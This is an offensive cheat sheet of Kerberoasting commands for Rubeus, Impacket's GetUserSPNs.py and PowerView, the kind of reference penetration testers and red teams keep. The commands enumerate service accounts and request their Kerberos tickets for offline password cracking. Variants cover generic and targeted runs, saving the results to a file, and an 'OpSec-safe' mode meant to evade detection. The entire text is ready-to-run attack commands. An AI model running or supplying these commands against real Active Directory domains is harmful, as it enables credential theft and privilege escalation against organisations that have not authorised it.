# Generic Kerberoasting with Rubeus
.\Rubeus.exe kerberoast /nowrap
# Generic Kerberoasting and saving the output to a file
.\Rubeus.exe kerberoast /nowrap /outfile:C:\Windows\Tasks\kerberoast.txt
# Perform targeted Kerberoasting with Rubeus
.\Rubeus.exe kerberoast /user:$serviceaccount
# OpSec-safe Kerberoasting with the 'tgtdeleg' trick, filtering out AES-enabled accounts
.\Rubeus.exe kerberoast /rc4opsec
Kerberoasting with Impacket
# List accounts with SPNs
GetUserSPNs.py $domain/$username:$password -dc-ip $dcip
# Generic Kerberoasting with Impacket
GetUserSPNs.py $domain/$username:$password -dc-ip $dcip -request
# Targeted Kerberoast
GetUserSPNs.py $domain/$username:$password -dc-ip $dcip /user:$serviceaccount -request
Kerberoasting with PowerView
# Generic Kerberoast with PowerView
Invoke-Kerberoast | fl
# Specify Domain in Kerberoast
Invoke-Kerberoast -Domain $domain | fl
